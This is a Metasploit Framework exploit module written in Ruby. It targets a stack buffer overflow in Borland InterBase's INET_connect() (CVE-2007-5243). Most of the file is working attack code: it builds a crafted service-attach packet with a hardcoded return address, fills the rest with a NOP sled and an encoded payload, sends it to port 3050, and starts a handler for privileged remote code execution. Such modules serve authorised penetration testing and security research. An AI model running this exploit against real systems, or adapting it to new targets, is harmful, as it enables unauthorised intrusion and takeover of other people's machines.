
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/ib_inet_connect.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the stack buffer overflow in Borland InterBase's
  # INET_connect() (CVE-2007-5243 / OSVDB 38605 / BID 25917). It sends one
  # op_service_attach request over TCP (default port 3050) whose 161-byte name
  # field ends in the target return address, followed by a 1024-byte database
  # parameter block holding a NOP sled and the payload.
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, the single Linux/x86 target and the RPORT option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Borland InterBase INET_connect() Buffer Overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in Borland InterBase
by sending a specially crafted service attach request.
      },
      'Author' =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch' => ARCH_X86,
      'Platform' => 'linux',
      'References' =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38605' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged' => true,
      'License' => MSF_LICENSE,
      'Payload' =>
        {
          # The payload shares a fixed 1024-byte block with a NOP sled in
          # exploit(); capping it at 512 keeps the sled length non-negative.
          'Space' => 512,
          # 0x3a (':') is also the separator exploit() writes after the
          # return address, so it must not occur inside the payload.
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
      'Targets' =>
        [
          # 0x0804d2ee 5b5e5f5dc3
          # NOTE(review): the hex above presumably lists the instruction bytes
          # found at Ret for this build -- not verifiable from this file.
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804d2ee }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2007-10-03'
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )
  end

  # Connects to the InterBase listener, sends a single service-attach packet,
  # then waits on the payload handler.
  #
  # Packet layout as built below (header words are big-endian, 'N'):
  #   opcode(4) | id(4) | length(4) | name(length, zero-padded to 4)
  #   | dpb_length(4) | dpb(1024 = NOP sled + encoded payload)
  def exploit
    connect

    # Attach database
    # op_attach and op_create are kept for reference only; nothing below
    # sends them.
    op_attach = 19

    # Create database
    op_create = 20

    # Service attach
    op_service_attach = 82

    # Declared size of the name field. It is filled with
    # (length - 5) random bytes + 4-byte return address + 1-byte ':'.
    length = 161
    remainder = length.remainder(4)
    padding = 0

    # Round the name field up to a multiple of 4 bytes (161 -> 3 pad bytes).
    if remainder > 0
      padding = (4 - remainder)
    end

    buf = ''

    # Operation/packet type
    buf << [op_service_attach].pack('N')

    # Id
    buf << [0].pack('N')

    # Length
    buf << [length].pack('N')

    # Random alpha data
    buf << rand_text_alpha(length - 5)

    # Target
    # 'L' packs in host byte order, unlike the 'N' (big-endian) header fields;
    # on a little-endian host this yields the byte order an x86 target expects.
    buf << [target.ret].pack('L')

    # Separator
    buf << ':'

    # Padding
    buf << "\x00" * padding

    # Database parameter block

    # Length
    buf << [1024].pack('N')

    # It will return into this nop block
    # Sled + payload total exactly 1024 bytes; payload.encoded is at most 512
    # ('Space'), so the NOP count cannot go negative.
    buf << make_nops(1024 - payload.encoded.length)

    # Payload
    buf << payload.encoded

    sock.put(buf)

    handler
  end
end